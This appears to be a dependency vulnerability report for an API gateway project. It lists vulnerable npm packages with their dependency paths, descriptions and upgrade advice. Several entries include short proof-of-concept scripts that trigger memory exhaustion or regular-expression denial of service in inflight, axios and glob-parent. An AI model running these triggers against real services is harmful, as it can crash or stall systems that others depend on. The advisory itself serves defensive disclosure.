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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › shelljs@0.8.5 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
Overview
Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.
Exploiting this vulnerability results in crashing the node process or in the application crash.
Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.
To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.
PoC
const inflight = require('inflight');
function testInflight() {
let i = 0;
function scheduleNext() {
let key = `key-${i++}`;
const callback = () => {
};
for (let j = 0; j < 1000000; j++) {
inflight(key, callback);
}
setImmediate(scheduleNext);
}
if (i % 100 === 0) {
console.log(process.memoryUsage());
}
scheduleNext();
}
testInflight();
Remediation
There is no fixed version for inflight.
References
medium severity
- Vulnerable module: axios
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › axios@0.20.0
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). An attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
Remediation
Upgrade axios to version 0.21.1 or higher.
References
medium severity
- Vulnerable module: got
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › github-username@3.0.0 › gh-got@5.0.0 › got@6.7.1
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › github-username@3.0.0 › gh-got@5.0.0 › got@6.7.1
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › github-username@4.1.0 › gh-got@6.0.0 › got@7.1.0
Overview
Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs. It allowed a victim to be redirected to a UNIX socket.
Remediation
Upgrade got to version 11.8.5, 12.1.0 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › axios@0.20.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker can deplete system resources by providing a manipulated string as input to the format method, causing the regular expression to exhibit a time complexity of O(n^2). This makes the server to become unable to provide normal service due to the excessive cost and time wasted in processing vulnerable regular expressions.
PoC
const axios = require('axios');
console.time('t1');
axios.defaults.baseURL = '/'.repeat(10000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t1');
console.time('t2');
axios.defaults.baseURL = '/'.repeat(100000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t2');
/* stdout
t1: 60.826ms
t2: 5.826s
*/
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade axios to version 0.29.0, 1.6.3 or higher.
References
medium severity
- Vulnerable module: ejs
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources due to the lack of certain pollution protection mechanisms. An attacker can exploit this vulnerability to manipulate object properties that should not be accessible or modifiable.
Note:
Even after updating to the fix version that adds enhanced protection against prototype pollution, it is still possible to override the hasOwnProperty method.
Remediation
Upgrade ejs to version 3.1.10 or higher.
References
medium severity
- Vulnerable module: glob-parent
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › glob-parent@3.1.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › glob-parent@3.1.0
Overview
glob-parent is a package that helps extracting the non-magic parent path from a glob string.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The enclosure regex used to check for strings ending in enclosure containing path separator.
PoC by Yeting Li
var globParent = require("glob-parent")
function build_attack(n) {
var ret = "{"
for (var i = 0; i < n; i++) {
ret += "/"
}
return ret;
}
globParent(build_attack(5000));
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade glob-parent to version 5.1.2 or higher.
References
medium severity
- Vulnerable module: micromatch
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10
Overview
Affected versions of this package are vulnerable to Inefficient Regular Expression Complexity due to the use of unsafe pattern configurations that allow greedy matching through the micromatch.braces() function. An attacker can cause the application to hang or slow down by passing a malicious payload that triggers extensive backtracking in regular expression processing.
Remediation
Upgrade micromatch to version 4.0.8 or higher.
References
medium severity
- Vulnerable module: redis
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › rate-limit-redis@1.7.0 › redis@2.8.0
Overview
redis is an A high performance Redis client.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). When a client is in monitoring mode, monitor_regex, which is used to detected monitor messages` could cause exponential backtracking on some strings, leading to denial of service.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade redis to version 3.1.1 or higher.
References
medium severity
- Vulnerable module: express-gateway
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11
Overview
express-gateway is an A microservices API gateway built on top of ExpressJS
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the /users/:id and /apps/:id routes, where unsanitized user-supplied input (req.params.id) is directly embedded into the server's response without proper HTML escaping. An attacker can inject and execute arbitrary scripts in the context of a user's browser by submitting crafted input to the affected endpoint.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for express-gateway.
References
medium severity
- Vulnerable module: express-gateway
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11
Overview
express-gateway is an A microservices API gateway built on top of ExpressJS
